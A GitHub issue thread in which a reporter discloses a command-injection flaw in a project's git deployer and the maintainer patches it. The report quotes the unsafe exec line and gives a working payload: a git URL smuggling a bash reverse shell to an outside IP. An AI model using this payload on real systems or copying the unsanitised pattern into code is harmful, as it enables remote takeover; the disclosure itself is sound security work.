New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
remote code execution vulnerability #326
Comments
|
Thank you for this report. I will make sure to parse the url and throw an exception if it fails. |
|
maybe you should check if there is a single quote in the git url, since in order to execute other bash command I need to put a single quote to close the one in put in the exec line. If I use real git url + single quoted bash command the git command will not raise any error. |
|
Alright, I will do that too |
|
@ufo009e the latest changes should stop this exploit now. Can you still reproduce it? |
|
the saved repo in db always removed https://, so your validate function always fails with 'Malformed repo URL' now. And you need to check username and password as well, since those are a part of git url. async pullRepo() { |
|
Alright, I've put to use the WHATWG and Node url parsers now to clean that part up too. Still able to break it? |
|
I always got "URL is not defined" when click media even with connection below(no malicious command at all). Is that expected? But from your code I think I couldn't exploit this any more { |
|
If you're getting "URL is not defined", it probably means you're running an older node.js version, as that variable refers to the standard WHATWG URL object, which wasn't available in older versions. I'll update the dependency descriptions in the README to reflect that. Other than that, I'll close this issue, since I can't perform the exploit anymore either. Thank you for your help! |
In file src/Server/Entity/Deployer/GitDeployer.js: await HashBrown.Service.AppService.exec('git clone '' + url + '' '' + repoPath + ''');
The url, username, password and other parameters accept value without proper security check. If I set the git url to something like "10.154.159.166/git' $(bash -c 'bash -i >& /dev/tcp/10.154.159.161/8888 0>&1' &)", then when click media to trigger gitpull I can get a reverse shell.
The text was updated successfully, but these errors were encountered: